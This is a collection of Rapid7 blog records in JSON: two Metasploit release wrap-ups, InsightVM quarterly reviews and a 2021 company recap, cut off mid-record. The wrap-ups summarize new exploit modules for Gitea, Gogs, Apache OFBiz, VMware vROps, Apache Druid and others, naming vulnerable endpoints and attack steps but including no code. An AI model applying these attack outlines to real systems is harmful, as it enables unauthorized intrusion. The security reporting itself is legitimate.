{"lastseen": "2021-04-09T20:50:41", "description": "## Spilling the (Gi)tea\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/04/metasploit-blg-3.png)\n\nWe have two modules coming in from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) targeting [CVE-2020-14144](<https://attackerkb.com/topics/ZTlYBaSclN/cve-2020-14144?referrer=blog>) for both the Gitea and Gogs self-hosted Git services. \nBoth modules are similar: they take advantage of a user\u2019s ability to create Git hooks by authenticating with the web interface, creating a dummy repository with the aforementioned git hook, and triggering it\u2014which will execute the payload!\n\n## Apache OFBiz Deserialization\n\nHere we have [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>) joining forces to bring us a module targeting [CVE-2021-26295](<https://attackerkb.com/topics/gPRJEi19sG/cve-2021-26295?referrer=blog>). \nThis module takes advantage of an unauthenticated SOAP interface in the Apache OFBiz application that accepts and deserializes an arbitrary Java object which leads to remote code execution.\n\n## New Modules (4)\n\n * [Apache OFBiz SOAP Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14971>) by wvu, Spencer McIntyre, and yumusb: This adds an exploit module that targets Apache OFBiz versions prior to `v17.12.06`, which are vulnerable to a Java deserialization vulnerability. By sending a serialized payload to the `webtools/control/SOAPService` endpoint, unauthenticated remote code execution as the user running the Apache OFBiz service can be achieved.\n * [Gitea and Gogs Git Hooks Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14978>) by Christophe De La Fuente and Podalirius: This adds two modules, `exploit/multi/http/gitea_git_hooks_rce` and `exploit/multi/http/gogs_git_hooks_rce` that both leverage a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gitea and Gogs respectively. With valid credentials and the permission to create git hooks, both modules create a repo and upload a payload as a `post-receive` hook. Upon creating an additional file in the repo, the `post-receive` hook will be triggered, which will grant code execution as the user running the software.\n * [Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server](<https://github.com/rapid7/metasploit-framework/pull/14965>) by Vladimir Ivanov and Yvan Genuer: This adds a new post module that leverages an insecure password storage vulnerability identified as CVE-2019-0307 to retrieve credentials such as SLD user connection and Solman user communication. This also improves the cve_2020_6207_solman_rce auxiliary module by adding a new SECTORE action performing the same attack remotely by leveraging an authentication bypass identified as CVE-2020-6207.\n\n## Enhancements and features\n\n * [#14813](<https://github.com/rapid7/metasploit-framework/pull/14813>) from [bcoles](<https://github.com/bcoles>): This updates the `exploit/windows/http/dupscts_bof` module by including coverage for six more vulnerable versions of the Dup Scout Enterprise software, leveraging auto-targeting, and adding module traits and references.\n\n## Bugs Fixed\n\n * [#14975](<https://github.com/rapid7/metasploit-framework/pull/14975>) from [timwr](<https://github.com/timwr>): This fixes an issue in `cve_2020_1054_drawiconex_lpe` module, which was throwing an exception when the target was not vulnerable.\n * [#14987](<https://github.com/rapid7/metasploit-framework/pull/14987>) from [dwelch-r7](<https://github.com/dwelch-r7>): Fixes an issue where users where only getting three attempts at brute forcing via `mysql_login` module.\n * [#14992](<https://github.com/rapid7/metasploit-framework/pull/14992>) from [jmartin-r7](<https://github.com/jmartin-r7>): Updates the auto_target_host logic to additionally handle rhost being nil\n * [#14998](<https://github.com/rapid7/metasploit-framework/pull/14998>) from [wvu-r7](<https://github.com/wvu-r7>): Changes CVE references from CVE Details to NVD\n * [#14873](<https://github.com/rapid7/metasploit-framework/pull/14873>) from [dwelch-r7](<https://github.com/dwelch-r7>): Fixes an issue where individual modules that failed to load would stop the remaining modules from loading successfully when running the `show payloads` command or `msfvenom -l payloads`\n * [#14988](<https://github.com/rapid7/metasploit-framework/pull/14988>) from [h00die](<https://github.com/h00die>): A fix to validation of custom wordlist values restores auxiliary cracker module functions when no custom wordlist file is supplied.\n * [#14991](<https://github.com/rapid7/metasploit-framework/pull/14991>) from [jra89](<https://github.com/jra89>): Fixes a regression that caused the NTP protocol fuzzer modules to crash when being used\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.38...6.0.39](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-01T08%3A47%3A57-05%3A00..2021-04-07T13%3A51%3A53-05%3A00%22>)\n * [Full diff 6.0.38...6.0.39](<https://github.com/rapid7/metasploit-framework/compare/6.0.38...6.0.39>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-09T19:17:46", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0307", "CVE-2020-14144", "CVE-2020-6207", "CVE-2021-26295"], "modified": "2021-04-09T19:17:46", "id": "RAPID7BLOG:5469B2F04F34A9BFD78A364ECC4F941F", "href": "https://blog.rapid7.com/2021/04/09/metasploit-wrap-up-106/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T18:51:30", "description": "## Operations shell\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/04/metasploit-blg-3-copy-1.png)\n\nOperations and management software make popular targets due to their users typically having elevated privileges across a network. Our own [wvu](<https://github.com/wvu-r7>) contributed the [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) exploit module for the vulnerabilities discovered by security researcher Egor Dimitrenko. The `exploit/linux/http/vmware_vrops_mgr_ssrf_rce` module achieves remote code execution (RCE) as the `admin` Unix user by chaining the two vulnerabilities. First, [CVE-2021-21975](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975?referrer=blog#rapid7-analysis>) pre-authentication server-side request forgery (SSRF) vulnerability is exploited in the `/casa/nodes/thumbprints` endpoint to obtain the admin credentials. Then, the credentials are used to authenticate to the vRealize Operations Manager API and exploit [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) via the `/casa/private/config/slice/ha/certificate` endpoint. This allows the module to write and execute an arbitrary file, a JSP payload in this case. The module should work against the following vulnerable versions:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n\n## Data rules everything around me\n\nMany dynamic websites and business applications have associated databases, therefore databases are commonplace on networks. Odds are you frequently encounter more than one database on an engagement. The release this week includes two new database related modules!\n\nThe first, an [Apache Druid RCE](<https://github.com/rapid7/metasploit-framework/pull/14977>) exploit module for a vulnerability in versions 0.20.0 and older. The vulnerability [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) was discovered by Litch1, and [je5442804](<https://github.com/je5442804>) contributed the module. The second, a gather module named [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) contributed by [Geoff Rainville (noncenz)](<https://github.com/noncenz>) enables easy looting of any key-value stores you discover.\n\n## New Module Content (5)\n\n * [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) by Geoff Rainville noncenz - Adds a module to retrieve all data from a Redis instance (version 2.8.0 and above).\n * [Apache Druid 0.20.0 Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14977>) by Litch1, Security Team of Alibaba Cloud and je5442804, which exploits [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) \\- This adds an exploit module that targets Apache Druid versions prior to `0.20.1`. An authenticated user can send a single request that both enables the execution of user-provided JavaScript code and executes the code on the server with the privileges of the user running the Apache Druid process. By default, Apache Druid does not require authentication.\n * [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) by wvu and Egor Dimitrenko, which exploits [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) \\- This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.\n * [Micro Focus Operations Bridge Reporter shrboadmin default password](<https://github.com/rapid7/metasploit-framework/pull/15086>) by Pedro Ribeiro, which exploits ZDI-20-1215 - This adds an exploit for [CVE-2020-11857](<https://attackerkb.com/topics/0rBqrv2UNX/cve-2020-11857?referrer=blog>) which is a hardcoded SSH password in Micro Focus Operations Bridge Manager instances.\n * [KOFFEE - Kia OFFensivE Exploit](<https://github.com/rapid7/metasploit-framework/pull/15021>) by Gianpiero Costantino and Ilaria Matteucci, which exploits [CVE-2020-8539](<https://attackerkb.com/topics/zXxJ29z090/cve-2020-8539?referrer=blog>) \\- This adds a post module that leverages the CVE-2020-8539 vulnerability on certain Kia Motors head units. This vulnerability is also known as KOFFEE.\n\n## Enhancements and features\n\n * [#11257](<https://github.com/rapid7/metasploit-framework/pull/11257>) from [sempervictus](<https://github.com/sempervictus>) \\- This PR adds the ability to wrap some powershell used for exploitation purposes with RC4 for obfuscation.\n * [#15014](<https://github.com/rapid7/metasploit-framework/pull/15014>) from [ctravis-r7](<https://github.com/ctravis-r7>) \\- Adds the ability to specify an individual private key as a string parameter into the `auxiliary/scanner/ssh/ssh_login_pubkey` module.\n * [#15110](<https://github.com/rapid7/metasploit-framework/pull/15110>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds the necessary functionality to the Java Meterpreter to resolve hostnames over DNS, closing a feature gap that had been present with other Meterpreters.\n\n## Bugs Fixed\n\n * [#14953](<https://github.com/rapid7/metasploit-framework/pull/14953>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix the python 3.6 string formatting syntax in modules/auxiliary/scanner/http/rdp_web_login\n * [#15050](<https://github.com/rapid7/metasploit-framework/pull/15050>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Fixes a crash in Metasploit's console when the user tried to tab complete values such as file paths that were missing their final ending quote\n * [#15081](<https://github.com/rapid7/metasploit-framework/pull/15081>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Updates the Microsoft SQL Server interesting data finder module to correctly handle the scenario where no interesting data is found. Previously this would result in a module crash.\n * [#15094](<https://github.com/rapid7/metasploit-framework/pull/15094>) from [timwr](<https://github.com/timwr>) \\- This fixed a bug in how certain Meterpreter's would execute command issued through `sessions -c` where some would use a subshell while others would not.\n * [#15114](<https://github.com/rapid7/metasploit-framework/pull/15114>) from [smashery](<https://github.com/smashery>) \\- Updates the `auxiliary/scanner/redis/file_upload` module to correctly handle Redis instances that require authenticated access\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-22T13%3A32%3A25%2B10%3A00..2021-04-29T10%3A54%3A48-05%3A00%22>)\n * [Full diff 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/compare/6.0.41...6.0.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-30T17:42:19", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"], "modified": "2021-04-30T17:42:19", "id": "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "href": "https://blog.rapid7.com/2021/04/30/metasploit-wrap-up-109/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/insightvm-q3.jpg)\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-1.png)\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-2.png)\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:04:19", "description": "![Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors](https://blog.rapid7.com/content/images/2022/01/rapid7-2021-wrapup.jpg)\n\nNow that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization's infrastructure secure \u2014 even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.\n\n## Emergent threats and vulnerability disclosures\n\nAs always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let's revisit some of the highlights.\n\n### Emergent threat reports\n\n * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)\n * [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\n * [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n * [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)\n\n### Vulnerability disclosures\n\n * [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)\n * [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * [CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>)\n\n## Research and policy highlights\n\nThat's not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.\n\n * We published several reports on the state of cybersecurity, including:\n * Our [2020 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2021/03/11/introducing-the-vulnerability-intelligence-report-50-cves-that-made-headlines-in-2020/>)\n * Our latest [Industry Cyber-Exposure Report (ICER)](<https://www.rapid7.com/blog/post/2021/05/05/rapid7-releases-new-industry-cyber-exposure-report-icer-asx-200/>)\n * Our [2021 Cloud Misconfigurations Report](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>)\n * We tackled the [hot-button topic of hack back](<https://www.rapid7.com/blog/post/2021/08/10/hack-back-is-still-wack/>) and discussed whether or not the practice is, in fact, wack. (Spoiler: It is.)\n * We unpacked the implications for [cybersecurity in the US Infrastructure Bill](<https://www.rapid7.com/blog/post/2021/08/31/cybersecurity-in-the-infrastructure-bill/>).\n * We highlighted the reasons why we think the [UK's Computer Misuse Act](<https://www.rapid7.com/blog/post/2021/08/12/reforming-the-uks-computer-misuse-act/>) needs some revising.\n * We launched [Project Doppler](<https://www.rapid7.com/research/project-doppler/>), a free tool for Rapid7 customers, developed by our Research team to help organizations get better insight into their public internet exposure.\n\n## The Rapid7 family keeps growing\n\nThroughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>) the one-stop shop for your security program.\n\n * [We acquired IntSights](<https://www.rapid7.com/blog/post/2021/07/19/rapid7-acquires-intsights/>) to help organizations obtain holistic threat intelligence.\n * [We teamed up with open-source platform Velociraptor](<https://www.rapid7.com/blog/post/2021/04/21/rapid7-and-velociraptor-join-forces/>) to provide teams with better endpoint visibility.\n * [We brought Kubernetes security provider Alcide](<https://www.rapid7.com/blog/post/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/>) under the Rapid7 umbrella to add more robust cloud security capabilities to InsightCloudSec.\n\n## Industry accolades\n\nWe're always thrilled to get industry recognition for the work we do helping protectors secure their organizations \u2014 and we had a few big nods to celebrate in 2021.\n\n * Gartner once again [named us a Leader](<https://www.rapid7.com/blog/post/2021/08/23/rapid7-mdr-named-a-market-leader-again/>) in its Magic Quadrant for Managed Detection and Response (MDR).\n * We also earned recognition as a Strong Performer in the [inaugural Forrester Wave for MDR](<https://www.rapid7.com/blog/post/2021/03/24/rapid7-recognized-as-a-strong-performer-in-the-inaugural-forrester-wave-for-mdr-q1-2021/>).\n * InsightIDR was recognized by Gartner us as a [Leader in SIEM](<https://www.rapid7.com/blog/post/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/>) for the second time in a row.\n * For its 2021 Dynamic Application Security Testing (DAST) Magic Quadrant, Gartner [named us a Visionary](<https://www.rapid7.com/blog/post/2021/06/01/rapid7-named-a-visionary-in-2021-gartner-magic-quadrant-for-application-security-testing/>).\n\n## Keeping in touch\n\nClearly, we had a pretty busy 2021 \u2014 and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.\n\n * Listen to the [latest season of Security Nation](<https://www.rapid7.com/blog/series/security-nation/security-nation-season-4/>), our podcast where we chat with amazing guests from all corners of the security community. Season 5 launches later this month!\n * Put the finishing touches on your cybersecurity program for the coming year with insights from our [2022 Planning series](<https://www.rapid7.com/blog/tag/2022-planning/>).\n * Get better acquainted with the latest application security threats with our series on the [OWASP Top 10 for 2021](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>).\n * Read up on why [InsightIDR was XDR before it was cool to be XDR](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>).\n\nStay tuned for more great content, research, and much more in 2022!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-05T18:52:41", "type": "rapid7blog", "title": "Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2021-1675", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-34527", "CVE-2021-3546", "CVE-2021-36934", "CVE-2021-44228"], "modified": "2022-01-05T18:52:41", "id": "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "href": "https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-28T15:43:01", "description": "![What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review](https://blog.rapid7.com/content/images/2022/09/insightvm-q3-2022.jpg)\n\nAnother quarter comes to a close! While we definitely had our share of summer fun, our team continued to invest in the product, releasing features and updates like recurring coverage for enterprise technologies, performance enhancements, and more. Let\u2019s take a look at some of the key releases in [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) from Q3. \n\n## [[InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>) and [Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>)] Recurring coverage for VMware vCenter\n\nRecurring coverage provides ongoing, automatic vulnerability coverage for popular enterprise technology and systems. We recently added VMware vCenter to our list.\n\nVMware vCenter Server is a centralized management platform used to manage virtual machines, ESXi hosts, and dependent components from a single host. Last year, vCenter was a significant target for bad actors and became the subject of a [number](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>) [of](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>) zero-days. Rapid7 provided ad hoc coverage to protect you against the vulnerabilities. Now, recurring coverage ensures fast, comprehensive protection that provides offensive and defensive security against vCenter vulnerabilities as they arise.\n\n## [InsightVM and Nexpose] Tune Assistant\n\nThe Security Console in InsightVM and Nexpose contains components that benefit from performance tuning. Tune Assistant is a built-in feature that will calculate performance tuning values based on resources allocated to the Security Console server, then automatically apply those values.\n\nTuning is calculated and applied to all new consoles when the product first starts up, and customers experiencing performance issues on existing consoles can now easily increase their own resources. For more information, read our [docs page](<https://docs.rapid7.com/insightvm/configuring-maximum-performance-in-an-enterprise-environment/>) on configuring maximum performance in an enterprise environment.\n\n![What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review](https://blog.rapid7.com/content/images/2022/09/image1-7.png)\n\n## [InsightVM and Nexpose] Windows Server 2022 Support\n\nWe want to ensure InsightVM and Nexpose are supported on business-critical technologies and operating systems. We added Windows Server 2022, the latest operating system for servers from Microsoft, to our list. The Scan Engine and Security Console can be installed and will be supported by Rapid7 on Windows Server 2022. [Learn more](<https://www.rapid7.com/products/insightvm/system-requirements/>) about the systems we support. \n\n## [InsightVM and Nexpose] Checks for notable vulnerabilities\n\nWith exploitation of major vulnerabilities in [Mitel MiVoice Connect](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>), multiple [Confluence](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) 